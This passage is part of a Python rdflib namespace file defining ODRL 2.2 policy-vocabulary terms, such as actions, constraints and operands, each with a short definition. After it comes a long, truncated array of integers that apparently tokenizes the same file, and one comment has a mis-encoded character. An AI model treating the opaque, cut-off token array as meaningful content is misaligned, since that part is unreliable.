relativeSpatialPosition: URIRef # The relative spatial positions - expressed as percentages of full values - of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space of the target Asset.
relativeTemporalPosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
resolution: URIRef # Resolution of the rendition of the target Asset.
spatial: URIRef # A named and identified geospatial area with defined borders which is used for exercising the action of the Rule. An IRI MUST be used to represent this value.
spatialCoordinates: URIRef # A set of coordinates setting the borders of a geospatial area used for exercising the action of the Rule. The coordinates MUST include longitude and latitude, they MAY include altitude and the geodetic datum.
support: URIRef # The Action is to be supported as part of the policy โ and the policy remains valid.
system: URIRef # An identified computing system used for exercising the action of the Rule.
systemDevice: URIRef # An identified computing system or computing device used for exercising the action of the Rule.
timeInterval: URIRef # A recurring period of time before the next execution of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
unitOfCount: URIRef # The unit of measure used for counting the executions of the action of the Rule.
version: URIRef # The version of the target Asset.
virtualLocation: URIRef # An identified location of the IT communication space which is relevant for exercising the action of the Rule.
# http://www.w3.org/2004/02/skos/core#Collection
# http://www.w3.org/2004/02/skos/core#Concept
Action: URIRef # An operation on an Asset.
Agreement: URIRef # A Policy that grants the assignee a Rule over an Asset from an assigner.
Assertion: URIRef # A Policy that asserts a Rule over an Asset from parties.
Asset: URIRef # A resource or a collection of resources that are the subject of a Rule.
AssetCollection: URIRef # An Asset that is collection of individual resources
AssetScope: URIRef # Scopes for Asset Scope expressions.
ConflictTerm: URIRef # Used to establish strategies to resolve conflicts that arise from the merging of Policies or conflicts between Permissions and Prohibitions in the same Policy.
Constraint: URIRef # A boolean expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Duty: URIRef # The obligation to perform an Action
LeftOperand: URIRef # Left operand for a constraint expression.
LogicalConstraint: URIRef # A logical expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Offer: URIRef # A Policy that proposes a Rule over an Asset from an assigner.
Operator: URIRef # Operator for constraint expression.
Party: URIRef # An entity or a collection of entities that undertake Roles in a Rule.
PartyCollection: URIRef # A Party that is a group of individual entities
PartyScope: URIRef # Scopes for Party Scope expressions.
Permission: URIRef # The ability to perform an Action over an Asset.
Policy: URIRef # A non-empty group of Permissions and/or Prohibitions.
Privacy: URIRef # A Policy that expresses a Rule over an Asset containing personal information.
Prohibition: URIRef # The inability to perform an Action over an Asset.
Request: URIRef # A Policy that proposes a Rule over an Asset from an assignee.
RightOperand: URIRef # Right operand for constraint expression.
Rule: URIRef # An abstract concept that represents the common characteristics of Permissions, Prohibitions, and Duties.
Set: URIRef # A Policy that expresses a Rule over an Asset.
Ticket: URIRef # A Policy that grants the holder a Rule over an Asset from an assigner.
UndefinedTerm: URIRef # Is used to indicate how to support Actions that are not part of any vocabulary or profile in the policy expression system.
acceptTracking: URIRef # To accept that the use of the Asset may be tracked.
adHocShare: URIRef # The act of sharing the asset to parties in close proximity to the owner.
aggregate: URIRef # To use the Asset or parts of it as part of a composite collection.
annotate: URIRef # To add explanatory notations/commentaries to the Asset without modifying the Asset in any other way.
anonymize: URIRef # To anonymize all or parts of the Asset.
append: URIRef # The act of adding to the end of an asset.
appendTo: URIRef # The act of appending data to the Asset without modifying the Asset in any other way.
archive: URIRef # To store the Asset (in a non-transient form).
attachPolicy: URIRef # The act of keeping the policy notice with the asset.
attachSource: URIRef # The act of attaching the source of the asset and its derivatives.
attribute: URIRef # To attribute the use of the Asset.
commercialize: URIRef # The act of using the asset in a business environment.
compensate: URIRef # To compensate by transfer of some amount of value, if defined, for using or selling the Asset.
concurrentUse: URIRef # To create multiple copies of the Asset that are being concurrently used.
copy: URIRef # The act of making an exact reproduction of the asset.
core: URIRef # Identifier for the ODRL Core Profile
delete: URIRef # To permanently remove all copies of the Asset after it has been used.
derive: URIRef # To create a new derivative Asset from this Asset and to edit or modify the derivative.
digitize: URIRef # To produce a digital copy of (or otherwise digitize) the Asset from its analogue form.
display: URIRef # To create a static and transient rendition of an Asset.
distribute: URIRef # To supply the Asset to third-parties.
ensureExclusivity: URIRef # To ensure that the Rule on the Asset is exclusive.
execute: URIRef # To run the computer program Asset.
export: URIRef # The act of transforming the asset into a new form.
extract: URIRef # To extract parts of the Asset and to use it as a new Asset.
extractChar: URIRef # The act of extracting (replicating) unchanged characters from the asset.
extractPage: URIRef # The act of extracting (replicating) unchanged pages from the asset.
extractWord: URIRef # The act of extracting (replicating) unchanged words from the asset.
give: URIRef # To transfer the ownership of the Asset to a third party without compensation and while deleting the original asset.
grantUse: URIRef # To grant the use of the Asset to third parties.
include: URIRef # To include other related assets in the Asset.
index: URIRef # To record the Asset in an index.
inform: URIRef # To inform that an action has been performed on or in relation to the Asset.
install: URIRef # To load the computer program Asset onto a storage device which allows operating or running the Asset.
lease: URIRef # The act of making available the asset to a third-party for a fixed period of time with exchange of value.
lend: URIRef # The act of making available the asset to a third-party for a fixed period of time without exchange of value.
license: URIRef # The act of granting the right to use the asset to a third-party.
modify: URIRef # To change existing content of the Asset. A new asset is not created by this action.
move: URIRef # To move the Asset from one digital location to another including deleting the original copy.
nextPolicy: URIRef # To grant the specified Policy to a third party for their use of the Asset.
obtainConsent: URIRef # To obtain verifiable consent to perform the requested action in relation to the Asset.
pay: URIRef # The act of paying a financial amount to a party for use of the asset.
play: URIRef # To create a sequential and transient rendition of an Asset.
present: URIRef # To publicly perform the Asset.
preview: URIRef # The act of providing a short preview of the asset.
print: URIRef # To create a tangible and permanent rendition of an Asset.
read: URIRef # To obtain data from the Asset.
reproduce: URIRef # To make duplicate copies the Asset in any material form.
reviewPolicy: URIRef # To review the Policy applicable to the Asset.
secondaryUse: URIRef # The act of using the asset for a purpose other than the purpose it was intended for.
sell: URIRef # To transfer the ownership of the Asset to a third party with compensation and while deleting the original asset.
share: URIRef # The act of the non-commercial reproduction and distribution of the asset to third-parties.
shareAlike: URIRef # The act of distributing any derivative asset under the same terms as the original asset.
stream: URIRef # To deliver the Asset in real-time.
synchronize: URIRef # To use the Asset in timed relations with media (audio/visual) elements of another Asset.
textToSpeech: URIRef # To have a text Asset read out loud.
transfer: URIRef # To transfer the ownership of the Asset in perpetuity.
transform: URIRef # To convert the Asset into a different format.
translate: URIRef # To translate the original natural language of an Asset into another natural language.
uninstall: URIRef # To unload and delete the computer program Asset from a storage device and disable its readiness for operation.
use: URIRef # To use the Asset
watermark: URIRef # To apply a watermark to the Asset.
write: URIRef # The act of writing to the Asset.
writeTo: URIRef # The act of adding data to the Asset.
# Valid non-python identifiers
_extras = [
"and",
"or",
"#actionConcepts",
"#actions",
"#actionsCommon",
"#assetConcepts",
"#assetParty",
"#assetRelations",
"#assetRelationsCommon",
"#conflictConcepts",
"#constraintLeftOperandCommon",
"#constraintLogicalOperands",
"#constraintRelationalOperators",
"#constraintRightOpCommon",
"#constraints",
"#deprecatedTerms",
"#duties",
"#logicalConstraints",
"#partyConcepts",
"#partyRoles",
"#partyRolesCommon",
"#permissions",
"#policyConcepts",
"#policySubClasses",
"#policySubClassesCommon",
"#prohibitions",
"#ruleConcepts",
]
_NS = Namespace("http://www.w3.org/ns/odrl/2/")
| [
6738,
374,
67,
2704,
571,
13,
14933,
10223,
1330,
2896,
1389,
36690,
10223,
11,
28531,
10223,
198,
6738,
374,
67,
2704,
571,
13,
4354,
1330,
37902,
4663,
891,
628,
198,
4871,
440,
7707,
43,
17,
7,
7469,
1389,
36690,
10223,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
440,
7707,
43,
10628,
362,
13,
17,
628,
220,
220,
220,
383,
440,
7707,
43,
47208,
22528,
290,
41986,
15738,
257,
900,
286,
10838,
290,
2846,
357,
1169,
25818,
8,
290,
21004,
9030,
198,
220,
220,
220,
357,
1169,
5408,
8,
329,
21627,
290,
13675,
6299,
12059,
4875,
2695,
8748,
1912,
319,
262,
440,
7707,
43,
198,
220,
220,
220,
6188,
9104,
13,
628,
220,
220,
220,
2980,
515,
422,
25,
3740,
1378,
2503,
13,
86,
18,
13,
2398,
14,
5907,
14,
375,
45895,
14,
17,
14,
3727,
7836,
1828,
13,
926,
75,
198,
220,
220,
220,
7536,
25,
12131,
12,
2713,
12,
2075,
1478,
25,
1238,
25,
2999,
13,
2327,
1954,
3980,
628,
220,
220,
220,
37227,
628,
220,
220,
220,
4808,
32165,
796,
6407,
628,
220,
220,
220,
1303,
2638,
1378,
2503,
13,
86,
18,
13,
2398,
14,
18946,
14,
2999,
14,
1828,
12,
4372,
69,
12,
1837,
41641,
12,
5907,
2,
21746,
198,
220,
220,
220,
2223,
25,
37902,
4663,
891,
220,
1303,
383,
4905,
11270,
284,
262,
31433,
329,
543,
262,
14330,
318,
852,
16164,
13,
198,
220,
220,
220,
290,
44015,
594,
25,
37902,
4663,
891,
220,
1303,
383,
8695,
318,
11378,
618,
1123,
286,
262,
1482,
2536,
6003,
389,
11378,
287,
262,
1502,
7368,
13,
198,
220,
220,
220,
8333,
1453,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
318,
262,
17800,
286,
262,
14330,
13,
198,
220,
220,
220,
8333,
1453,
5189,
25,
37902,
4663,
891,
220,
1303,
11440,
6945,
281,
440,
7707,
43,
7820,
329,
543,
262,
5174,
3615,
10122,
1124,
262,
8333,
1453,
10345,
2597,
13,
198,
220,
220,
220,
8333,
263,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
318,
262,
44168,
286,
262,
14330,
13,
198,
220,
220,
220,
8333,
263,
5189,
25,
37902,
4663,
891,
220,
1303,
11440,
6945,
281,
440,
7707,
43,
7820,
329,
543,
262,
5174,
3615,
10122,
1124,
262,
8333,
263,
10345,
2597,
13,
198,
220,
220,
220,
14183,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
284,
307,
14183,
13,
198,
220,
220,
220,
24548,
278,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
508,
10122,
1124,
262,
39629,
13,
198,
220,
220,
220,
34304,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
318,
262,
17800,
286,
262,
9836,
13,
198,
220,
220,
220,
7144,
803,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
326,
318,
262,
10131,
286,
262,
9836,
13,
198,
220,
220,
220,
5358,
25,
37902,
4663,
891,
220,
1303,
383,
5358,
12,
29268,
4811,
329,
257,
7820,
13,
198,
220,
220,
220,
762,
4714,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
508,
909,
12143,
262,
8281,
13,
198,
220,
220,
220,
8281,
278,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
284,
7330,
8281,
422,
13,
198,
220,
220,
220,
12921,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
257,
18104,
284,
1194,
18104,
11,
262,
6846,
852,
257,
12921,
286,
407,
26187,
262,
1966,
13,
198,
220,
220,
220,
32315,
25,
37902,
4663,
891,
220,
1303,
1482,
2536,
2913,
5625,
284,
257,
14330,
198,
220,
220,
220,
23407,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
508,
318,
852,
23407,
13,
198,
220,
220,
220,
29148,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
508,
318,
6011,
262,
2775,
13,
198,
220,
220,
220,
1366,
6030,
25,
37902,
4663,
891,
220,
1303,
383,
4818,
265,
2981,
286,
262,
1988,
286,
262,
826,
18843,
392,
393,
826,
18843,
392,
26687,
286,
257,
1482,
2536,
2913,
13,
198,
220,
220,
220,
7077,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
281,
1981,
18104,
284,
257,
2448,
3411,
13,
198,
220,
220,
220,
5287,
25,
37902,
4663,
891,
220,
1303,
25743,
318,
281,
12531,
3119,
326,
15738,
262,
8747,
357,
273,
555,
4164,
8,
2776,
1022,
14252,
13,
198,
220,
220,
220,
2163,
25,
37902,
4663,
891,
220,
1303,
15553,
318,
281,
12531,
3119,
3025,
850,
12,
48310,
8160,
262,
10345,
9176,
543,
743,
307,
23085,
416,
257,
2151,
287,
8695,
284,
257,
14330,
13,
198,
220,
220,
220,
468,
36727,
25,
37902,
4663,
891,
220,
1303,
11440,
6945,
281,
440,
7707,
43,
7820,
329,
543,
262,
5174,
31433,
318,
262,
2496,
31433,
284,
477,
262,
14252,
13,
198,
220,
220,
220,
15565,
25,
37902,
4663,
891,
220,
1303,
1052,
7561,
29348,
326,
1194,
7561,
318,
407,
12244,
284,
7139,
663,
13919,
33815,
13,
198,
220,
220,
220,
3017,
818,
25,
37902,
4663,
891,
220,
1303,
1052,
7561,
1007,
1800,
306,
29348,
326,
1194,
7561,
326,
38932,
663,
13919,
33815,
13,
198,
220,
220,
220,
7981,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
284,
307,
7981,
286,
477,
3544,
13,
198,
220,
220,
220,
29140,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
508,
3769,
262,
4175,
779,
1366,
13,
198,
220,
220,
220,
16955,
3237,
6972,
25,
37902,
4663,
891,
220,
1303,
1423,
16856,
611,
262,
7820,
9312,
460,
307,
19552,
13,
198,
220,
220,
220,
16955,
4863,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
257,
357,
9410,
8,
2450,
284,
1194,
357,
8000,
8,
2450,
422,
543,
2846,
389,
19552,
13,
198,
220,
220,
220,
16955,
6892,
341,
25,
37902,
4663,
891,
220,
1303,
11440,
6945,
262,
2099,
286,
24155,
13,
198,
220,
220,
220,
1364,
18843,
392,
25,
37902,
4663,
891,
220,
1303,
383,
1364,
1515,
392,
287,
257,
32315,
5408,
13,
198,
220,
220,
220,
12990,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
281,
1981,
18104,
284,
257,
7820,
13,
198,
220,
220,
220,
1515,
392,
25,
37902,
4663,
891,
220,
1303,
6564,
392,
318,
281,
12531,
3119,
329,
257,
12219,
2776,
13,
198,
220,
220,
220,
10088,
25,
37902,
4663,
891,
220,
1303,
383,
10088,
2163,
5625,
284,
1515,
1746,
286,
257,
1482,
2536,
2913,
198,
220,
220,
220,
5072,
25,
37902,
4663,
891,
220,
1303,
383,
5072,
3119,
26052,
262,
31433,
543,
318,
2727,
422,
262,
5072,
286,
262,
7561,
13,
198,
220,
220,
220,
636,
5189,
25,
37902,
4663,
891,
220,
1303,
11440,
6945,
281,
31433,
14,
33553,
36307,
326,
262,
31433,
14,
33553,
318,
257,
2888,
286,
13,
198,
220,
220,
220,
1414,
1453,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
318,
262,
17800,
286,
262,
6074,
13,
198,
220,
220,
220,
7170,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
281,
1981,
2448,
3411,
284,
257,
7820,
13,
198,
220,
220,
220,
7034,
25,
37902,
4663,
891,
220,
1303,
383,
27421,
7,
82,
8,
286,
281,
440,
7707,
43,
13118,
326,
262,
7820,
17216,
82,
284,
13,
198,
220,
220,
220,
19548,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
281,
1981,
43091,
284,
257,
7820,
13,
198,
220,
220,
220,
20387,
25,
37902,
4663,
891,
220,
1303,
1052,
1988,
12739,
262,
3542,
9449,
393,
1474,
1108,
13,
198,
220,
220,
220,
47517,
25,
37902,
4663,
891,
220,
1303,
1482,
2536,
2913,
973,
284,
35139,
262,
33815,
286,
281,
7561,
11,
393,
3615,
14,
45869,
12251,
198,
220,
220,
220,
8695,
25,
37902,
4663,
891,
220,
1303,
4718,
341,
318,
281,
12531,
3119,
543,
8075,
281,
7952,
2792,
1022,
281,
7561,
290,
281,
31433,
13,
198,
220,
220,
220,
21210,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
281,
1981,
21210,
18104,
284,
257,
43091,
13,
198,
220,
220,
220,
826,
18843,
392,
25,
37902,
4663,
891,
220,
1303,
383,
1988,
286,
262,
826,
1515,
392,
287,
257,
32315,
5408,
13,
198,
220,
220,
220,
826,
18843,
392,
26687,
25,
37902,
4663,
891,
220,
1303,
317,
4941,
284,
257,
3992,
8271,
4955,
262,
1988,
329,
262,
826,
1515,
392,
286,
257,
1482,
2536,
2913,
13,
198,
220,
220,
220,
8354,
25,
37902,
4663,
891,
220,
1303,
383,
27421,
286,
257,
8354,
326,
3769,
4732,
284,
262,
6287,
286,
262,
9312,
13,
198,
220,
220,
220,
2723,
25,
37902,
4663,
891,
220,
1303,
20984,
284,
257,
31433,
14,
33553,
36307,
198,
220,
220,
220,
3722,
25,
37902,
4663,
891,
220,
1303,
262,
1988,
7560,
422,
262,
1364,
18843,
392,
2223,
393,
257,
1988,
3519,
284,
262,
1364,
18843,
392,
900,
355,
262,
4941,
329,
262,
7208,
13,
198,
220,
220,
220,
2496,
25,
37902,
4663,
891,
220,
1303,
383,
2496,
3119,
9217,
262,
31433,
326,
318,
262,
4165,
2426,
284,
543,
262,
14330,
2223,
3264,
8991,
13,
198,
220,
220,
220,
28805,
12332,
25,
37902,
4663,
891,
220,
1303,
383,
1271,
286,
4201,
706,
543,
28805,
1138,
1586,
779,
286,
262,
11171,
6140,
13,
198,
220,
220,
220,
18283,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
3025,
8748,
318,
852,
18283,
13,
198,
220,
220,
220,
9646,
33553,
25,
37902,
4663,
891,
220,
1303,
383,
3615,
508,
318,
9646,
8748,
13,
198,
220,
220,
220,
334,
312,
25,
37902,
4663,
891,
220,
1303,
1052,
42053,
29709,
27421,
198,
220,
220,
220,
28721,
25,
37902,
4663,
891,
220,
1303,
4718,
689,
262,
4811,
973,
329,
9041,
28721,
4028,
284,
257,
7820,
13,
198,
220,
220,
220,
4326,
25,
37902,
4663,
891,
220,
1303,
383,
4326,
286,
15558,
286,
262,
1988,
286,
262,
826,
18843,
392,
393,
826,
18843,
392,
26687,
286,
257,
1482,
2536,
2913,
13,
198,
220,
220,
220,
2124,
505,
25,
37902,
4663,
891,
220,
1303,
383,
8695,
318,
11378,
618,
691,
530,
11,
290,
407,
517,
11,
286,
262,
1482,
2536,
6003,
318,
11378,
628,
220,
220,
220,
1303,
2638,
1378,
2503,
13,
86,
18,
13,
2398,
14,
16942,
14,
2998,
14,
4883,
2,
45,
2434,
35392,
198,
220,
220,
220,
1439,
25,
37902,
4663,
891,
220,
1303,
18291,
6945,
326,
262,
8354,
286,
262,
2776,
318,
477,
286,
262,
10098,
3925,
1626,
257,
4732,
13,
198,
220,
220,
220,
1439,
17,
358,
13313,
507,
25,
37902,
4663,
891,
220,
1303,
18291,
6945,
326,
262,
8354,
286,
262,
2776,
318,
477,
286,
262,
1218,
12,
5715,
8787,
284,
262,
3615,
13,
198,
220,
220,
220,
1439,
13313,
507,
25,
37902,
4663,
891,
220,
1303,
18291,
6945,
326,
262,
8354,
286,
262,
2776,
318,
477,
286,
262,
717,
12,
5715,
8787,
286,
262,
3615,
13,
198,
220,
220,
220,
1439,
38,
14459,
25,
37902,
4663,
891,
220,
1303,
18291,
6945,
326,
262,
8354,
286,
262,
2776,
318,
477,
286,
262,
1448,
8787,
286,
262,
3615,
13,
198,
220,
220,
220,
4912,
25,
37902,
4663,
891,
220,
1303,
18291,
6945,
326,
262,
8354,
286,
262,
2776,
318,
262,
5447,
1448,
351,
3294,
1981,
1866,
13,
198,
220,
220,
220,
18629,
25,
37902,
4663,
891,
220,
1303,
18291,
6945,
326,
262,
8354,
286,
262,
2776,
318,
262,
2060,
3615,
1981,
13,
198,
220,
220,
220,
4112,
26545,
25,
37902,
4663,
891,
220,
1303,
317,
966,
287,
2272,
393,
640,
5447,
351,
4112,
22715,
329,
262,
22097,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
4112,
10699,
25,
37902,
4663,
891,
220,
1303,
24291,
7,
82,
8,
286,
530,
393,
734,
34197,
329,
362,
35,
12,
48205,
393,
3953,
7,
82,
8,
286,
530,
284,
5509,
34197,
329,
513,
35,
12,
48205,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
4112,
4561,
34961,
26545,
25,
37902,
4663,
891,
220,
1303,
383,
4112,
21739,
6116,
286,
1440,
14371,
286,
257,
35991,
319,
257,
362,
35,
12,
5171,
11017,
393,
262,
3624,
14371,
286,
257,
13617,
1868,
287,
257,
513,
35,
12,
13200,
329,
262,
2496,
31433,
284,
4197,
13,
198,
220,
220,
220,
4112,
12966,
35738,
26545,
25,
37902,
4663,
891,
220,
1303,
383,
4112,
21964,
6116,
287,
257,
2056,
4269,
262,
2496,
31433,
468,
284,
4197,
13,
198,
220,
220,
220,
954,
25,
37902,
4663,
891,
220,
1303,
399,
39223,
954,
286,
30632,
286,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
3128,
7575,
25,
37902,
4663,
891,
220,
1303,
383,
3128,
357,
392,
11902,
640,
290,
640,
11340,
8,
286,
25352,
262,
2223,
286,
262,
14330,
13,
6498,
1515,
392,
1988,
17191,
307,
281,
2124,
21282,
25,
4475,
393,
2124,
21282,
25,
4475,
7575,
355,
5447,
416,
16410,
19875,
15952,
2611,
1157,
12,
17,
60,
4083,
198,
220,
220,
220,
5711,
5990,
2101,
25,
37902,
4663,
891,
220,
1303,
317,
640,
5711,
2278,
3161,
284,
25352,
262,
2223,
286,
262,
14330,
13,
383,
966,
287,
640,
26555,
428,
2278,
26720,
307,
5447,
416,
1194,
21964,
1482,
2536,
2913,
5929,
416,
257,
5972,
605,
1482,
2536,
2913,
357,
22602,
1710,
262,
267,
7109,
75,
25,
392,
44015,
594,
1515,
392,
737,
6498,
1515,
392,
1988,
17191,
307,
281,
2124,
21282,
25,
32257,
355,
5447,
416,
16410,
19875,
15952,
2611,
1157,
12,
17,
60,
4083,
198,
220,
220,
220,
7585,
29239,
25,
37902,
4663,
891,
220,
1303,
383,
7585,
6518,
973,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
3335,
25,
37902,
4663,
891,
220,
1303,
1052,
5174,
3335,
973,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
42118,
7575,
25,
37902,
4663,
891,
220,
1303,
317,
12948,
42118,
640,
2278,
543,
743,
307,
973,
329,
25352,
286,
262,
2223,
286,
262,
14330,
13,
6498,
1515,
392,
1988,
17191,
307,
281,
2124,
21282,
25,
32257,
355,
5447,
416,
16410,
19875,
15952,
2611,
1157,
12,
17,
60,
4083,
198,
220,
220,
220,
37430,
25,
37902,
4663,
891,
220,
1303,
1423,
12364,
326,
257,
1813,
1988,
21767,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
1785,
25,
37902,
4663,
891,
220,
1303,
1052,
5174,
1785,
4634,
257,
4732,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
2393,
26227,
25,
37902,
4663,
891,
220,
1303,
317,
14434,
2393,
5794,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
308,
83,
25,
37902,
4663,
891,
220,
1303,
1423,
12364,
326,
257,
1813,
1988,
318,
3744,
621,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
308,
660,
80,
25,
37902,
4663,
891,
220,
1303,
1423,
12364,
326,
257,
1813,
1988,
318,
3744,
621,
393,
4961,
284,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
468,
7841,
25,
37902,
4663,
891,
220,
1303,
317,
900,
12,
3106,
10088,
12739,
326,
257,
1813,
1988,
4909,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
8856,
25,
37902,
4663,
891,
220,
1303,
383,
7561,
318,
284,
307,
9514,
290,
318,
407,
636,
286,
262,
2450,
784,
290,
262,
2450,
3793,
4938,
13,
198,
220,
220,
220,
2831,
25,
37902,
4663,
891,
220,
1303,
317,
5447,
2831,
6567,
4634,
257,
4732,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
12515,
25,
37902,
4663,
891,
220,
1303,
383,
2450,
318,
7951,
13,
198,
220,
220,
220,
318,
32,
25,
37902,
4663,
891,
220,
1303,
317,
900,
12,
3106,
10088,
12739,
326,
257,
1813,
1988,
318,
281,
4554,
286,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
318,
3237,
5189,
25,
37902,
4663,
891,
220,
1303,
317,
900,
12,
3106,
10088,
12739,
326,
257,
1813,
1988,
318,
477,
286,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
318,
7149,
5189,
25,
37902,
4663,
891,
220,
1303,
317,
900,
12,
3106,
10088,
12739,
326,
257,
1813,
1988,
318,
597,
286,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
318,
14202,
5189,
25,
37902,
4663,
891,
220,
1303,
317,
900,
12,
3106,
10088,
12739,
326,
257,
1813,
1988,
318,
4844,
286,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
318,
7841,
5189,
25,
37902,
4663,
891,
220,
1303,
317,
900,
12,
3106,
10088,
12739,
326,
257,
1813,
1988,
318,
7763,
416,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
3303,
25,
37902,
4663,
891,
220,
1303,
317,
3288,
3303,
973,
416,
262,
2496,
31433,
13,
198,
220,
220,
220,
300,
83,
25,
37902,
4663,
891,
220,
1303,
1423,
12364,
326,
257,
1813,
1988,
318,
1342,
621,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
300,
660,
80,
25,
37902,
4663,
891,
220,
1303,
1423,
12364,
326,
257,
1813,
1988,
318,
1342,
621,
393,
4961,
284,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
2056,
25,
37902,
4663,
891,
220,
1303,
21743,
286,
257,
2056,
11171,
4634,
257,
4732,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
1138,
1068,
7575,
25,
37902,
4663,
891,
220,
1303,
1052,
22425,
2033,
286,
530,
284,
867,
1138,
1068,
640,
9574,
543,
547,
973,
329,
25352,
262,
2223,
286,
262,
14330,
13,
6498,
1515,
392,
1988,
17191,
307,
281,
2124,
21282,
25,
32257,
355,
5447,
416,
16410,
19875,
15952,
2611,
1157,
12,
17,
60,
4083,
198,
220,
220,
220,
497,
80,
25,
37902,
4663,
891,
220,
1303,
1423,
12364,
326,
257,
1813,
1988,
318,
407,
4961,
284,
262,
826,
1515,
392,
286,
262,
1482,
2536,
2913,
13,
198,
220,
220,
220,
1414,
31264,
25,
37902,
4663,
891,
220,
1303,
383,
2033,
286,
257,
3176,
6074,
13,
6498,
1515,
392,
1988,
17191,
307,
281,
2124,
21282,
25,
12501,
4402,
13,
198,
220,
220,
220,
5873,
25,
37902,
4663,
891,
220,
1303,
317,
5873,
2033,
286,
262,
2496,
31433,
5981,
329,
25352,
262,
2223,
286,
262,
14330,
13,
6498,
1515,
392,
1988,
17191,
307,
281,
2124,
21282,
25,
12501,
4402,
422,
657,
284,
1802,
13,
198,
220,
220,
220,
9943,
25,
37902,
4663,
891,
220,
1303,
2448,
8481,
1011,
12741,
625,
49724,
13,
198,
220,
220,
220,
2450,
28350,
25,
37902,
4663,
891,
220,
1303,
1423,
16856,
262,
4036,
4818,
8079,
262,
2223,
286,
262,
14330,
373,
25805,
13,
198,
220,
220,
220,
1720,
25,
37902,
4663,
891,
220,
1303,
21743,
286,
1720,
393,
2139,
4634,
257,
4732,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
20767,
25,
37902,
4663,
891,
220,
1303,
1041,
3145,
1756,
1011,
12741,
625,
21627,
13,
198,
220,
220,
220,
4007,
25,
37902,
4663,
891,
220,
1303,
317,
5447,
4007,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
17800,
25,
37902,
4663,
891,
220,
1303,
383,
2151,
6464,
262,
1255,
14,
448,
2958,
286,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
3585,
26545,
25,
37902,
4663,
891,
220,
1303,
317,
966,
287,
2272,
393,
640,
5447,
351,
22715,
3585,
284,
1336,
5260,
262,
22097,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
3585,
10699,
25,
37902,
4663,
891,
220,
1303,
24291,
7,
82,
8,
286,
530,
393,
734,
34197,
329,
362,
35,
12,
48205,
393,
3953,
7,
82,
8,
286,
530,
284,
5509,
34197,
329,
513,
35,
12,
48205,
532,
6241,
355,
28071,
286,
1336,
3815,
532,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
3585,
4561,
34961,
26545,
25,
37902,
4663,
891,
220,
1303,
383,
3585,
21739,
6116,
532,
6241,
355,
28071,
286,
1336,
3815,
532,
286,
1440,
14371,
286,
257,
35991,
319,
257,
362,
35,
12,
5171,
11017,
393,
262,
3624,
14371,
286,
257,
13617,
1868,
287,
257,
513,
35,
12,
13200,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
3585,
12966,
35738,
26545,
25,
37902,
4663,
891,
220,
1303,
317,
966,
287,
2272,
393,
640,
5447,
351,
22715,
3585,
284,
1336,
5260,
262,
22097,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
6323,
25,
37902,
4663,
891,
220,
1303,
22406,
286,
262,
40570,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
21739,
25,
37902,
4663,
891,
220,
1303,
317,
3706,
290,
5174,
4903,
2117,
34961,
1989,
351,
5447,
11637,
543,
318,
973,
329,
25352,
262,
2223,
286,
262,
14330,
13,
1052,
314,
7112,
17191,
307,
973,
284,
2380,
428,
1988,
13,
198,
220,
220,
220,
21739,
